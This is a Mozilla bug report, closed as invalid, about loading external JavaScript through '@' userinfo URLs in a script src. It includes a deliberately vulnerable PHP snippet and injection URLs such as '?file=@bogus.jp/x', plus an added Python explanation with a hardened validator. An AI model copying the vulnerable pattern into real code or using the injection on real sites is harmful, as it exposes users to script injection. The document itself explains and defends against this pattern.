Closed
Bug 804146
Opened 12 years ago
Closed 12 years ago
XSS via PHP
Categories: Core :: General, defect
Status: RESOLVED INVALID
People
(Reporter: curtisk, Unassigned)
Details
Hello.
I found that Firefox has a risk of potential XSS.
If a tag like the one below is in an HTML file,
<script src="http://packetmonster.com@bogus.jp/x"></script>
Firefox reads http://bogus.jp/x directly (no alert).
It can be forced to read external JavaScript code.
----------------------------------
This php script has risk of potential XSS.
<?php
$base="http://packetmonster.com";
// The unvalidated ?file= value is appended to $base; htmlspecialchars()
// escapes HTML metacharacters but leaves '@' untouched.
echo '<script src="'.htmlspecialchars($base.$_GET["file"]).'"></script>';
?>
------------------------------
Usually access via a URL like this is assumed:
http://packetmonster.com/scriptsrcxss.php?file=/base.js
This URL makes it possible to execute external JavaScript:
http://packetmonster.com/scriptsrcxss.php?file=@bogus.jp/x
Regards.
-
Yuji Tounai
bogus@bogus.jp
http://twitmatome.bogus.jp/
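The following is an added Python example, not code from the bug report or from Mozilla. It shows why the report's URL ends up on a different host: in `http://packetmonster.com@bogus.jp/x`, everything before the `@` is userinfo and `bogus.jp` is the authority, which is exactly how a standard URL parser (here `urllib.parse.urlsplit`) reads it. It then contrasts a direct port of the PHP concatenation with a hardened server-side check that only accepts a plain path and re-verifies the parsed host. The function names `build_script_src`, `effective_host` and `safe_script_src`, and the constant `BASE`, are assumptions made for this example.

```python
import html
from urllib.parse import urlsplit

# Same base as the PHP script in the report.
BASE = "http://packetmonster.com"
EXPECTED_HOST = "packetmonster.com"


def build_script_src(file_param: str) -> str:
    """Direct port of the PHP line: base + raw ?file= value, HTML-escaped.

    html.escape(quote=True) behaves like htmlspecialchars() for the
    characters that matter here; neither one escapes '@'.
    """
    return html.escape(BASE + file_param, quote=True)


def effective_host(url: str) -> str:
    """Return the host a URL parser (and a browser) will actually contact."""
    return urlsplit(url).hostname or ""


def safe_script_src(file_param: str):
    """Hardened variant: accept only a same-origin path, else return None.

    Two layers: a syntactic allow-check on the parameter, then a check
    on the parsed result so that any parser quirk is caught as well.
    """
    # Must be an absolute path on this site, not protocol-relative ("//").
    if not file_param.startswith("/") or file_param.startswith("//"):
        return None
    # Characters that could change the authority, query or fragment.
    if any(c in file_param for c in "@?#\\"):
        return None
    url = BASE + file_param
    # Defence in depth: the parsed host must still be ours.
    if urlsplit(url).hostname != EXPECTED_HOST:
        return None
    return html.escape(url, quote=True)


if __name__ == "__main__":
    # Constructed inputs mirroring the two URLs in the report.
    for param in ("/base.js", "@bogus.jp/x"):
        src = build_script_src(param)
        print(f"file={param!r:16} src={src!r:48} host={effective_host(BASE + param)}"
              f" safe={safe_script_src(param)!r}")
```

Running the script prints that `@bogus.jp/x` yields a host of `bogus.jp` despite the escaped output looking harmless, while `safe_script_src` rejects it and only passes the plain `/base.js` path through.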
Comment 2•12 years ago
There is nothing unknown here nor a security risk. Websites can load scripts from other domains as part of the design of the web.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → INVALID